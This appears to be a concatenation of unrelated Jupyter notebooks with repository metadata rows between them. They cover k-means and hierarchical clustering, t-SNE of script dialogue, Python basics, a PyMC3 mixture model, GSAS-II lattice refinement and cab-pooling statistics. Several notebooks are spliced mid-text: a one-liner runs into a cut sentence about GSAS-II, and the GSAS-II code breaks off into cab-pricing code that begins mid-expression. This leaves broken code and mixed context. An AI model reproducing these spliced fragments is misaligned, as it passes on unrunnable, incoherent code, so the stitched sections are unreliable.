from sklearn.preprocessing import MinMaxScaler #normalising so knn donot effected by features having larger values
# fit scaler on training data
norm = MinMaxScaler().fit(X_train)
# transform training data
X_train_norm = norm.transform(X_train)
# transform testing dataabs
X_test_norm = norm.transform(X_test)
# + colab={"base_uri": "https://localhost:8080/", "height": 404} id="oa8R1FbJ8YWp" outputId="434fedf0-13cf-4a6d-b08e-aa1e9484d90b"
from sklearn.cluster import KMeans
wcss = []
for i in range(1, 11):
kmeans = KMeans(n_clusters = i, init = 'k-means++', random_state = 42)
kmeans.fit(X_test)
# inertia method returns wcss for that model
wcss.append(kmeans.inertia_)
plt.figure(figsize=(10,5))
sns.lineplot(range(1, 11), wcss,marker='o',color='red')
plt.title('The Elbow Method')
plt.xlabel('Number of clusters')
plt.ylabel('WCSS')
plt.show()
# + colab={"base_uri": "https://localhost:8080/", "height": 404} id="FBJT_nn98pNj" outputId="4a989739-967b-4445-8841-a9955067379a"
from sklearn.cluster import KMeans
wcss = []
for i in range(1, 11):
kmeans = KMeans(n_clusters = i, init = 'k-means++', random_state = 42)
kmeans.fit(X_test_norm)
# inertia method returns wcss for that model
wcss.append(kmeans.inertia_)
plt.figure(figsize=(10,5))
sns.lineplot(range(1, 11), wcss,marker='o',color='red')
plt.title('The Elbow Method')
plt.xlabel('Number of clusters')
plt.ylabel('WCSS')
plt.show()
# + id="qtjoPH619lAm"
kmeans = KMeans(n_clusters = 3, init = 'k-means++', random_state = 42)
y_kmeans = kmeans.fit_predict(X_train_norm)
# + colab={"base_uri": "https://localhost:8080/"} id="dsn1bgj--Eem" outputId="ed41cb3c-b11f-4aa4-cd3d-153d2c7ff244"
print(y_kmeans)
#We convert our prediction to dataframe so we can easily see this prediction in table form
df_pred = pd.DataFrame(y_kmeans)
print(df_pred.value_counts())
| 4,579 |
/Similar Character.ipynb
|
b8fc2f1c3fa5e6f3eeabddb025305aeccf3119cc
|
[] |
no_license
|
MGMSA6/similarity-prediction
|
https://github.com/MGMSA6/similarity-prediction
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 3,779,300 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
import pandas as pd
import numpy as np
df = pd.read_json('script-bag-of-words.json')
df.head()
df.tail()
# +
# getting chartacter, words and num of words said by character
dialouge = {}
for index, row in df.iterrows():
for item in row['text']:
if item['name'] in dialouge:
# append
dialouge[item['name']] = dialouge[item['name']] + item['text']
else:
# create character
dialouge[item['name']] = item['text'] + " "
# -
len(dialouge)
new_df = pd.DataFrame()
new_df['character'] = dialouge.keys()
new_df['words'] = dialouge.values()
new_df
new_df.iloc[:,0:3].head()
new_df['num_words'] = new_df['words'].apply(lambda x:len(x.split()))
new_df = new_df.sort_values('num_words',ascending=False)
new_df = new_df.head(100)
new_df.shape
new_df.head()
from sklearn.feature_extraction.text import CountVectorizer
cv = CountVectorizer(stop_words='english')
embeddings = cv.fit_transform(new_df['words'])
embeddings.shape
embeddings = embeddings.astype('float64')
from sklearn.manifold import TSNE
tsne = TSNE(n_components=2, verbose=1, random_state=123)
z = tsne.fit_transform(embeddings)
z.shape
new_df['x'] = z.T[0]
new_df['y'] = z.T[1]
new_df
# !pip install plotly
import plotly.express as px
fig = px.scatter(new_df.head(25), x='x', y='y', color='character')
fig.show()
| 1,652 |
/chap1_6_2-checkpoint.ipynb
|
e717a3a89317a212df9d4158d5542b7c71e8c53d
|
[] |
no_license
|
Kimdonghyun0516/compvision
|
https://github.com/Kimdonghyun0516/compvision
| 1 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 3,742 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# The general recipe for calling functions and saving the result to a variable is thus:
#
# output = function_name(input)
# +
# Create variables var1 and var2
var1 = [1, 2, 3, 4]
var2 = True
# Print out type of var1
print(type(var1))
# Print out length of var1
print(len(var1))
# Convert var2 to an integer: out2
out2 = int(var2)
# -
# help() is useful.
# You'll see that sorted() takes three arguments: iterable, key and reverse.
# +
# Create lists first and second
first = [11.25, 18.0, 20.0]
second = [10.75, 9.50]
# Paste together first and second: full
full = first + second
# Sort full in descending order: full_sorted
full_sorted = sorted(full, reverse=True)
# Print out full_sorted
print(full_sorted)
# -
# Strings come with a bunch of methods.
# +
# string to experiment with: place
place = "poolhouse"
# Use upper() on place: place_up
place_up = place.upper()
# Print out place and place_up
print(place)
print(place_up)
# Print out the number of o's in place
print(place.count("o"))
# -
# Strings are not the only Python types that have methods associated with them. Lists, floats, integers and booleans are also types that come packaged with a bunch of useful methods.
# +
# Create list areas
areas = [11.25, 18.0, 20.0, 10.75, 9.50]
# Print out the index of the element 20.0
print(areas.index(20.0))
# Print out how often 9.50 appears in areas
print(areas.count(9.50))
# -
# Most list methods will change the list they're called on.
# +
# Create list areas
areas = [11.25, 18.0, 20.0, 10.75, 9.50]
# Use append twice to add poolhouse and garage size
areas.append(24.5)
areas.append(15.45)
# Print out areas
print(areas)
# Reverse the orders of the elements in areas
areas.reverse()
# Print out areas
print(areas)
# +
# Definition of radius
r = 0.43
# Import the math package
import math
# Calculate C
C = 2 * math.pi * r
# Calculate A
A = math.pi * r**2
# Build printout
print("Circumference: " + str(C))
print("Area: " + str(A))
# -
# General imports, like import math, make all functionality from the math package available to you. However, if you decide to only use a specific part of a package, you can always make your import more selective
# +
# Definition of radius
r = 192500
# Import radians function of math package
from math import radians
# Travel distance of Moon over 12 degrees. Store in dist.
dist = r * radians(12)
# Print out dist
print(dist)
# -
# There are several ways to import packages and modules into Python. Depending on the import call, you'll have to use different Python code.
from scipy.linalg import inv as my_inv
my_inv([[1,2], [3,4]])
| 2,888 |
/ДЗ лекции/Task_5/Lab_5_v_13.ipynb
|
54ffd6c3b34f8f312b52f17f38f29a169245028a
|
[] |
no_license
|
VeronikaSotskova/data_analysys_3course
|
https://github.com/VeronikaSotskova/data_analysys_3course
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 294,736 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="dBeXfhUVfjrg"
# ## Кластерный анализ
#
# Необходимо провести кластерный анализ предложенного набора данных при помощи:
#
# -иерархической кластеризации;
# - метода k средних;
# - методов, реализованных вами и сокурсниками.
#
# Этапы работы
# - Выполнить кластерный анализ.
# - Отобрать необходимые переменные.
# - Выполнить стандартизацию (если это нужно).
#
# - Визуализировать результаты при помощи дендрограммы и многомерного шкалирования
# - Определить число кластеров.
# - Построить график "каменистая осыпь" ("локоть").
# - Обосновать свой выбор, проверив другие варианты.
# - Рассчитать критерии качества
#
# - Интерпретировать результаты кластерного анализа: что представляют собой полученные кластеры? чем объекты в каждом из получившихся кластеров похожи друг на друга? чем объекты из разных кластеров отличаются друг от друга?
# Сравнить результаты , полученные различными методами.
# - Сделать выводы
#
#
# - (пока не нужно)Разделить выборку на части. На тестовой выборке получить кластеризацию и добавить таргет-переменную, полученную в результате кластерного анализа. Запустить модель обучения, классифицирующая объекты и проверить предсказания на тестовой выборке.
#
# + id="ASg_0_A_fj7d" executionInfo={"status": "ok", "timestamp": 1608235680118, "user_tz": -180, "elapsed": 701, "user": {"displayName": "Veronika Sotskova", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhLNN43JKAW1NCIumyulALF7c7-9n3XWD50sXnK=s64", "userId": "13222701999781590371"}}
import pandas as pd
from sklearn.preprocessing import MinMaxScaler
from sklearn.cluster import KMeans
import matplotlib.pyplot as plt
import numpy as np
import seaborn as sns
from sklearn.metrics import silhouette_score
from sklearn.metrics import davies_bouldin_score
# + colab={"base_uri": "https://localhost:8080/", "height": 195} id="8YYMPuYJgEn5" executionInfo={"status": "ok", "timestamp": 1607710698164, "user_tz": -180, "elapsed": 621, "user": {"displayName": "Veronika Sotskova", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhLNN43JKAW1NCIumyulALF7c7-9n3XWD50sXnK=s64", "userId": "13222701999781590371"}} outputId="78ca16ba-ad63-487b-ec80-1f27cd35655f"
data = pd.read_csv('housing.csv',sep=';', header=None, names=['CRIM', 'ZN', 'INDUS', 'CHAS', 'NOX', 'RM', 'AGE', 'DIS', 'RAD', 'TAX', 'PTRATIO', 'B', 'LSTAT', 'MEDV'])
data.head()
# + colab={"base_uri": "https://localhost:8080/", "height": 304} id="iZs950Qk0h4r" executionInfo={"status": "ok", "timestamp": 1607710699142, "user_tz": -180, "elapsed": 914, "user": {"displayName": "Veronika Sotskova", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhLNN43JKAW1NCIumyulALF7c7-9n3XWD50sXnK=s64", "userId": "13222701999781590371"}} outputId="6f379402-3056-4e2f-ff60-d63f8be5f6d2"
data.describe()
# + id="O__NNDnOknrM"
y = data['MEDV']
X = data[['ZN', 'RM', 'LSTAT']]
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} id="Ee8YOJSzrFrv" executionInfo={"status": "ok", "timestamp": 1607710700071, "user_tz": -180, "elapsed": 1311, "user": {"displayName": "Veronika Sotskova", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhLNN43JKAW1NCIumyulALF7c7-9n3XWD50sXnK=s64", "userId": "13222701999781590371"}} outputId="7dce7d56-eed2-4e17-d162-e210e3fa06b5"
corr = X.corr()
# ZN RM DIS? TAX? LSTAT
plt.figure(figsize=(20,20))
sns.heatmap(corr, cbar=True, square= True, fmt='.1f', annot=True, annot_kws={'size':15}, cmap='Greens')
# + id="JMRO9FgOrICP"
from sklearn.preprocessing import StandardScaler
std_scaler = StandardScaler()
scaled_df = pd.DataFrame(std_scaler.fit_transform(data), columns=data.columns)
# + id="qba0o23yym7_"
from sklearn.cluster import KMeans
Sum_of_squared_distances = []
K = range(1,11)
for k in K:
km = KMeans(n_clusters=k)
km = km.fit(data)
Sum_of_squared_distances.append(km.inertia_)
# + colab={"base_uri": "https://localhost:8080/", "height": 384} id="VVCg0Qtlyn_x" executionInfo={"status": "ok", "timestamp": 1607713487208, "user_tz": -180, "elapsed": 798, "user": {"displayName": "Veronika Sotskova", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhLNN43JKAW1NCIumyulALF7c7-9n3XWD50sXnK=s64", "userId": "13222701999781590371"}} outputId="035d090c-16c4-4a5a-d8ae-5359f639ef73"
plt.plot(K, Sum_of_squared_distances, 'bx-')
plt.xlabel('k')
plt.ylabel('Sum_of_squared_distances')
plt.title('Метод локтя для оптимального k')
plt.show()
# + colab={"base_uri": "https://localhost:8080/", "height": 395} id="BrfImsdN0RSz" executionInfo={"status": "ok", "timestamp": 1607713525257, "user_tz": -180, "elapsed": 975, "user": {"displayName": "Veronika Sotskova", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhLNN43JKAW1NCIumyulALF7c7-9n3XWD50sXnK=s64", "userId": "13222701999781590371"}} outputId="e365e4c1-cc47-4daa-9ff4-511be3b669d2"
from sklearn.cluster import KMeans
kmeans = KMeans(n_clusters=3,algorithm='elkan')
km_pred = kmeans.fit_predict(X)
plt.scatter(data['RM'], data['LSTAT'], c = kmeans.labels_)
plt.title('Data')
plt.figure(figsize=(10,6))
plt.show()
# + colab={"base_uri": "https://localhost:8080/"} id="XMKLk-zNLT8E" executionInfo={"status": "ok", "timestamp": 1607713527026, "user_tz": -180, "elapsed": 729, "user": {"displayName": "Veronika Sotskova", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhLNN43JKAW1NCIumyulALF7c7-9n3XWD50sXnK=s64", "userId": "13222701999781590371"}} outputId="53a8959c-e104-4ede-ba16-63ca4c3b32a8"
print("K-Means")
km_silhouette = silhouette_score(X,km_pred)
print("Silhouette score ", km_silhouette)
km_db = davies_bouldin_score(X,km_pred)
print("Davies Bouldin score ", km_db)
# + colab={"base_uri": "https://localhost:8080/"} id="oVcZTdFPBUQb" executionInfo={"status": "ok", "timestamp": 1607713530397, "user_tz": -180, "elapsed": 671, "user": {"displayName": "Veronika Sotskova", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhLNN43JKAW1NCIumyulALF7c7-9n3XWD50sXnK=s64", "userId": "13222701999781590371"}} outputId="c4c0cd05-b662-4c70-8580-de760487df24"
X['Cluster'] = km_pred
data['Cluster'] = X['Cluster']
# + colab={"base_uri": "https://localhost:8080/", "height": 388} id="85kRS9lG36Sh" executionInfo={"status": "ok", "timestamp": 1607713540642, "user_tz": -180, "elapsed": 1003, "user": {"displayName": "Veronika Sotskova", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhLNN43JKAW1NCIumyulALF7c7-9n3XWD50sXnK=s64", "userId": "13222701999781590371"}} outputId="116c1ed0-27a1-4ff8-ca64-3d4bc1fbe302"
from scipy.cluster.hierarchy import linkage, dendrogram
dataStdHC = linkage(scaled_df.sample(40), method = 'ward', metric = 'euclidean')
dn = dendrogram(dataStdHC, leaf_font_size = 12, color_threshold = 5.5)
plt.title('Дендрограмма по иерархической кластеризации со стандартизованными данными')
plt.rcParams["figure.figsize"] = (20,6)
plt.show()
# + colab={"base_uri": "https://localhost:8080/", "height": 186} id="hBu1Erq3CaCm" executionInfo={"status": "ok", "timestamp": 1607713544708, "user_tz": -180, "elapsed": 763, "user": {"displayName": "Veronika Sotskova", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhLNN43JKAW1NCIumyulALF7c7-9n3XWD50sXnK=s64", "userId": "13222701999781590371"}} outputId="bdeb86cb-fb9e-4621-c72a-db36faaaf6d1"
data.groupby('Cluster').mean()
# + colab={"base_uri": "https://localhost:8080/", "height": 166} id="bX0-kx_M87Fj" executionInfo={"status": "ok", "timestamp": 1607713545742, "user_tz": -180, "elapsed": 722, "user": {"displayName": "Veronika Sotskova", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhLNN43JKAW1NCIumyulALF7c7-9n3XWD50sXnK=s64", "userId": "13222701999781590371"}} outputId="63a199b9-172a-4341-abdc-e6ae73955a5b"
data.groupby('Cluster').mean()[['ZN', 'RM', 'LSTAT']]
# + colab={"base_uri": "https://localhost:8080/"} id="hoeQ_22dCC2-" executionInfo={"status": "ok", "timestamp": 1607713546848, "user_tz": -180, "elapsed": 1063, "user": {"displayName": "Veronika Sotskova", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhLNN43JKAW1NCIumyulALF7c7-9n3XWD50sXnK=s64", "userId": "13222701999781590371"}} outputId="dc22092e-03d2-42c3-862e-f1b5637d5a13"
data.groupby('Cluster').count()['MEDV']
# + colab={"base_uri": "https://localhost:8080/", "height": 395} id="ebrHiSQsFWG0" executionInfo={"status": "ok", "timestamp": 1607713607350, "user_tz": -180, "elapsed": 876, "user": {"displayName": "Veronika Sotskova", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhLNN43JKAW1NCIumyulALF7c7-9n3XWD50sXnK=s64", "userId": "13222701999781590371"}} outputId="b8dabdc0-13c3-45bb-9bc3-aa536f404dcf"
from sklearn.cluster import AgglomerativeClustering
aggl = AgglomerativeClustering(n_clusters=3)
data['Aggl_predict'] = aggl.fit_predict(data)
plt.scatter(data['RM'], data['LSTAT'], c = aggl.labels_)
plt.title('AgglomerativeClustering prediction')
plt.figure(figsize=(8,6))
plt.show()
# + colab={"base_uri": "https://localhost:8080/"} id="I9TWW3wcMheH" executionInfo={"status": "ok", "timestamp": 1607713609334, "user_tz": -180, "elapsed": 644, "user": {"displayName": "Veronika Sotskova", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhLNN43JKAW1NCIumyulALF7c7-9n3XWD50sXnK=s64", "userId": "13222701999781590371"}} outputId="d952ad0a-326e-48d6-d121-683dda359635"
print("AgglomerativeClustering")
km_silhouette = silhouette_score(data,data['Aggl_predict'])
print("Silhouette score ", km_silhouette)
km_db = davies_bouldin_score(data,data['Aggl_predict'])
print("Davies Bouldin score ", km_db)
# + colab={"base_uri": "https://localhost:8080/", "height": 186} id="M9VBvhrpHEHF" executionInfo={"status": "ok", "timestamp": 1607713615120, "user_tz": -180, "elapsed": 893, "user": {"displayName": "Veronika Sotskova", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhLNN43JKAW1NCIumyulALF7c7-9n3XWD50sXnK=s64", "userId": "13222701999781590371"}} outputId="0cb84259-cc49-44c7-c220-ce7f932bead8"
data.groupby('Aggl_predict').mean()
# + colab={"base_uri": "https://localhost:8080/", "height": 166} id="KMuM8XRXJAzp" executionInfo={"status": "ok", "timestamp": 1607713619043, "user_tz": -180, "elapsed": 652, "user": {"displayName": "Veronika Sotskova", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhLNN43JKAW1NCIumyulALF7c7-9n3XWD50sXnK=s64", "userId": "13222701999781590371"}} outputId="cf8c0415-2e4e-4983-d8a1-f8cdc1428ba9"
data.groupby('Aggl_predict').mean()[['ZN', 'RM', 'LSTAT']]
# + colab={"base_uri": "https://localhost:8080/"} id="SJgVdcdjJFtf" executionInfo={"status": "ok", "timestamp": 1607713620036, "user_tz": -180, "elapsed": 551, "user": {"displayName": "Veronika Sotskova", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhLNN43JKAW1NCIumyulALF7c7-9n3XWD50sXnK=s64", "userId": "13222701999781590371"}} outputId="e6e0cc26-5419-458a-d568-a0f65d501b3a"
data.groupby('Aggl_predict').count()['MEDV']
| 11,027 |
/pymc3/examples/gaussian_mixture_model.ipynb
|
0bec96004111c3406b29296dcb5b9e2468f99c10
|
[
"Apache-2.0",
"AFL-2.1"
] |
permissive
|
ds7788/hello-world
|
https://github.com/ds7788/hello-world
| 1 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 273,026 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# !date
import numpy as np, pandas as pd, matplotlib.pyplot as plt, seaborn as sns
# %matplotlib inline
sns.set_context('paper')
sns.set_style('darkgrid')
# # Mixture Model in PyMC3
#
# Original NB by Abe Flaxman, modified by Thomas Wiecki
#
import pymc3 as pm, theano.tensor as tt
# +
# simulate data from a known mixture distribution
np.random.seed(12345) # set random seed for reproducibility
k = 3
ndata = 500
spread = 5
centers = np.array([-spread, 0, spread])
# simulate data from mixture distribution
v = np.random.randint(0, k, ndata)
data = centers[v] + np.random.randn(ndata)
plt.hist(data);
# -
# setup model
model = pm.Model()
with model:
# cluster sizes
a = pm.constant(np.array([1., 1., 1.]))
p = pm.Dirichlet('p', a=a, shape=k)
# ensure all clusters have some points
p_min_potential = pm.Potential('p_min_potential', tt.switch(tt.min(p) < .1, -np.inf, 0))
# cluster centers
means = pm.Normal('means', mu=[0, 0, 0], sd=15, shape=k)
# break symmetry
order_means_potential = pm.Potential('order_means_potential',
tt.switch(means[1]-means[0] < 0, -np.inf, 0)
+ tt.switch(means[2]-means[1] < 0, -np.inf, 0))
# measurement error
sd = pm.Uniform('sd', lower=0, upper=20)
# latent cluster of each observation
category = pm.Categorical('category',
p=p,
shape=ndata)
# likelihood for each observed value
points = pm.Normal('obs',
mu=means[category],
sd=sd,
observed=data)
# fit model
with model:
step1 = pm.Metropolis(vars=[p, sd, means])
step2 = pm.ElemwiseCategoricalStep(vars=[category], values=[0, 1, 2])
tr = pm.sample(10000, step=[step1, step2])
# ## Full trace
pm.plots.traceplot(tr, ['p', 'sd', 'means']);
# ## After convergence
# take a look at traceplot for some model parameters
# (with some burn-in and thinning)
pm.plots.traceplot(tr[5000::5], ['p', 'sd', 'means']);
# I prefer autocorrelation plots for serious confirmation of MCMC convergence
pm.autocorrplot(tr[5000::5], varnames=['sd'])
# ## Sampling of cluster for individual data point
i=0
plt.plot(tr['category'][5000::5, i], drawstyle='steps-mid')
plt.axis(ymin=-.1, ymax=2.1)
def cluster_posterior(i=0):
print('true cluster:', v[i])
print(' data value:', np.round(data[i],2))
plt.hist(tr['category'][5000::5,i], bins=[-.5,.5,1.5,2.5,], rwidth=.9)
plt.axis(xmin=-.5, xmax=2.5)
plt.xticks([0,1,2])
cluster_posterior(i)
| 2,890 |
/Analysis/9 nov 12/Untitled.ipynb
|
47aa5b2a70344468f1530c73c8f47dcc8753ff58
|
[] |
no_license
|
aBITnav/Scheduling
|
https://github.com/aBITnav/Scheduling
| 4 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 478,351 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# 
# 
# +
import functools
print(functools.reduce(lambda x, y: x * y, map(lambda x: x**5, map(int, input().split()))))
uch as GSAS-II.
#
# In this additional notebook we will find the starting lattice parameters using GSAS-II.
#
# **Note, this example uses the lead sulphate data data found here: https://github.com/lanl/spotlight/tree/master/examples/lead_sulphate**
#
# **If running the notebook, you need to copy the data files to the directory you run the notebook.**
#
# **Note, this notebook was tested using GSAS-II revision r5609.**
# # Define cost function
#
# We define the following cost function that sets up the lead sulphate example from the GSAS-II tutorial.
# +
import GSASIIscriptable as gsasii
import GSASIIlattice as lattice
import io
import multiprocess
import os
import shutil
import sys
import time
from mystic import models
from spotlight import filesystem
class CostFunction(models.AbstractFunction):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# if True then create the subdir and copy data files there
self.initialized = False
# if True then print GSAS-II output
self.debug = False
# define a list of detectors
self.detectors = [dict(data_file="./PBSO4.xra",
detector_file="./INST_XRY.prm",
min_two_theta=16.0,
max_two_theta=158.4),
dict(data_file="./PBSO4.cwn",
detector_file="./inst_d1a.prm",
min_two_theta=19.0,
max_two_theta=153.0)]
# define a list of phases
self.phases = [dict(phase_file="./PbSO4-Wyckoff.cif",
phase_label="PBSO4")]
def function(self, p):
# get start time of this step for stdout
t0 = time.time()
# create run dir
dir_name = f"opt_{multiprocess.current_process().name}"
if not self.initialized:
filesystem.mkdir(dir_name)
for detector in self.detectors:
filesystem.cp([detector["data_file"], detector["detector_file"]], dest=dir_name)
for phase in self.phases:
filesystem.cp([phase["phase_file"]], dest=dir_name)
self.initialized = True
# create a text trap and redirect stdout
# this is just to make the stdout easier to follow
if not self.debug:
silent_stdout = io.StringIO()
sys.stdout = sys.stderr = silent_stdout
# create a GSAS-II project
gpx = gsasii.G2Project(newgpx=f"{dir_name}/lead_sulphate.gpx")
# add histograms
for det in self.detectors:
gpx.add_powder_histogram(det["data_file"], det["detector_file"])
# add phases
for phase in self.phases:
gpx.add_phase(phase["phase_file"], phase["phase_label"],
histograms=gpx.histograms())
# turn on background refinement
args = {
"Background": {
"no. coeffs" : 3,
"refine": True,
}
}
for hist in gpx.histograms():
hist.set_refinements(args)
# refine
gpx.do_refinements([{}])
gpx.save(f"{dir_name}/step_1.gpx")
# create a GSAS-II project
gpx = gsasii.G2Project(f"{dir_name}/step_1.gpx")
gpx.save(f"{dir_name}/step_2.gpx")
# change lattice parameters
for phase in gpx["Phases"].keys():
# ignore data key
if phase == "data":
continue
# handle PBSO4 phase
elif phase == "PBSO4":
cell = gpx["Phases"][phase]["General"]["Cell"]
a, b, c = p
t11, t22, t33 = cell[1] / a, cell[2] / b, cell[3] / c
gpx["Phases"][phase]["General"]["Cell"][1:] = lattice.TransformCell(
cell[1:7], [[t11, 0.0, 0.0],
[0.0, t22, 0.0],
[0.0, 0.0, t33]])
# otherwise raise error because refinement plan does not support this phase
else:
raise NotImplementedError("Refinement plan cannot handle phase {}".format(phase))
# turn on unit cell refinement
args = {
"set": {
"Cell" : True,
}
}
# refine
gpx.set_refinement(args)
gpx.do_refinements([{}])
# now restore stdout and stderr
if not self.debug:
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
# get minimization statistic
stat = gpx["Covariance"]["data"]["Rvals"]["Rwp"]
# print a message to follow the results
print(f"Our R-factor is {stat} and it took {time.time() - t0}s to compute")
return stat
# -
# ## An ensemble using only the cost function
#
# Below, we present an example of using an ensemble of optimizers in parallel with GSAS-II to find the global minimum.
# **Note, this will take awhile. It depends on the number of processors available on your machine.**
# We set the number of function calls to 50 to limit the amount of time it will take.
# +
from mystic import tools
from mystic.solvers import BuckshotSolver
from mystic.solvers import NelderMeadSimplexSolver
from mystic.termination import VTR
from pathos.pools import ProcessPool as Pool
# set the ranges
target = [8.474, 5.394, 6.954]
lower_bounds = [x * 0.95 for x in target]
upper_bounds = [x * 1.05 for x in target]
# get number of parameters in model
ndim = len(target)
# set random seed so we can reproduce results
tools.random_seed(0)
# create a solver
solver = BuckshotSolver(dim=ndim, npts=8)
# set multi-processing pool
solver.SetMapper(Pool().map)
# since we have an search solver
# we specify what optimization algorithm to use within the search
# we tell the optimizer to not go more than 50 evaluations of our cost function
subsolver = NelderMeadSimplexSolver(ndim)
subsolver.SetEvaluationLimits(50, 50)
solver.SetNestedSolver(subsolver)
# set the range to search for all parameters
solver.SetStrictRanges(lower_bounds, upper_bounds)
# find the minimum
solver.Solve(CostFunction(ndim), VTR())
# print the best parameters
print(f"The best solution is {solver.bestSolution} with Rwp {solver.bestEnergy}")
print(f"The reference solutions is {target}")
ratios = [x / y for x, y in zip(target, solver.bestSolution)]
print(f"The ratios of to the reference values are {ratios}")
# -
# This concludes the example using GSAS-II.
dists[i] / (1000.0 * our_cab_count[i])
print("~~~~~~~~~~~~~~~~~~TOTAL Price Paid by THEM For DIFFERENT CAB TYPES~~~~~~~~~~~~~~~~~")
their_stats['cab_type_price'] = {}
their_total_price = 0
for i in range(3):
prc = price[i] * (their_cab_wise_dists[i] / 1000.0)
print('{} :{}'.format(cab_types[i], prc))
their_stats['cab_type_price'][cab_types[i]] = prc
their_total_price += prc
their_stats['total_price'] = their_total_price
print('Their Total Price: :{}'.format(their_total_price))
print("~~~~~~~~~~~~~~~~~~TOTAL Price Paid By us For DIFFERENT CAB TYPES~~~~~~~~~~~~~~~~~")
our_total_price = 0
our_stats['cab_type_price'] = {}
for i in range(3):
prc = price[i] * (our_cab_wise_dists[i] / 1000.0)
our_stats['cab_type_price'][cab_types[i]] = prc
print('{} :{}'.format(cab_types[i], prc))
our_total_price += prc
our_stats['total_price'] = our_total_price
print('Our Total Price: :{}'.format(our_total_price))
price_efficiency = their_total_price / our_total_price - 1
print("Price Efficiency: {}".format(price_efficiency))
print("~~~~~~~~~~~~~~~~~~Their Cab wise average droutes~~~~~~~~~~~~~~~~~")
their_stats['cab_wise_avg_droutes'] = {}
for typ, droutes in zip(cab_types, their_cab_wise_droutes):
print("{}: {}".format(typ, sum(droutes) / len(droutes)))
their_stats['cab_wise_avg_droutes'][typ] = sum(droutes) / len(droutes)
print("~~~~~~~~~~~~~~~~~~Our Cab wise average droutes~~~~~~~~~~~~~~~~~")
our_stats['cab_wise_avg_droutes'] = {}
for typ, droutes in zip(cab_types, our_cab_wise_droutes):
print("{}: {}".format(typ, sum(droutes) / len(droutes)))
our_stats['cab_wise_avg_droutes'][typ] = sum(droutes) / len(droutes)
print("OUR PLOT")
print("Cab Type: INDICA")
plt.bar(range(len(our_cab_wise_droutes[0])), our_cab_wise_droutes[0])
plt.show()
print("Cab Type: SUMO")
plt.bar(range(len(our_cab_wise_droutes[1])), our_cab_wise_droutes[1])
plt.show()
print("Cab Type: TT")
plt.bar(range(len(our_cab_wise_droutes[2])), our_cab_wise_droutes[2])
plt.show()
print("Cab Type: INDICA")
plt.bar(range(len(their_cab_wise_droutes[0])), their_cab_wise_droutes[0])
plt.show()
print("Cab Type: SUMO")
plt.bar(range(len(their_cab_wise_droutes[1])), their_cab_wise_droutes[1])
plt.show()
print("Cab Type: TT")
plt.bar(range(len(their_cab_wise_droutes[2])), their_cab_wise_droutes[2])
plt.show()
print("Their pool size: people count")
their_occupancy = cab_occupancy(their_pools)
our_occupancy = cab_occupancy(our_pools)
print("our Occupancy")
our_stats['occupancy'] = {}
our_stats['people_by_cab'] = {}
for i in range(3):
our_stats['people_by_cab'][cab_types[i]] = our_occupancy[i]
our_stats['occupancy'][cab_types[i]] = our_occupancy[i] / (get_seat(cab_types[i]) * our_cab_count[i])
print("CAB TYPE: {} => {}".format(cab_types[i],
our_occupancy[i] / (get_seat(cab_types[i]) * our_cab_count[i])))
print("Their Occupancy")
their_stats['occupancy'] = {}
their_stats['people_by_cab'] = {}
for i in range(3):
their_stats['people_by_cab'][cab_types[i]] = their_occupancy[i]
their_stats['occupancy'][cab_types[i]] = their_occupancy[i] / (get_seat(cab_types[i]) * their_cab_count[i])
print("CAB TYPE: {} => {}".format(cab_types[i],
their_occupancy[i] / (get_seat(cab_types[i]) * their_cab_count[i])))
print("Employee Wise droute:Ours-Red, Theirs-Blue")
plt.bar(range(len(their_employee_wise_droute)), their_employee_wise_droute)
plt.bar(range(len(our_employee_wise_droute)), our_employee_wise_droute, color='red')
plt.show()
good = 0
for i in range(len(employees)):
if their_employee_wise_droute[i] >= our_employee_wise_droute[i]:
good += 1
print("Employee Wise Distance: Ours:Red, Theirs: Blue")
plt.bar(range(len(their_employee_wise_dists)), their_employee_wise_dists)
plt.bar(range(len(our_employee_wise_dists)), our_employee_wise_dists, color='red')
'''with open('our 9 nov 12.json', 'w') as f:
f.write(json.dumps(our_stats))
with open('their 9 nov 12.json', 'w') as f:
f.write(json.dumps(their_stats))'''
# -
their_employee_wise_droute
our_pools
their_pools
| 11,662 |
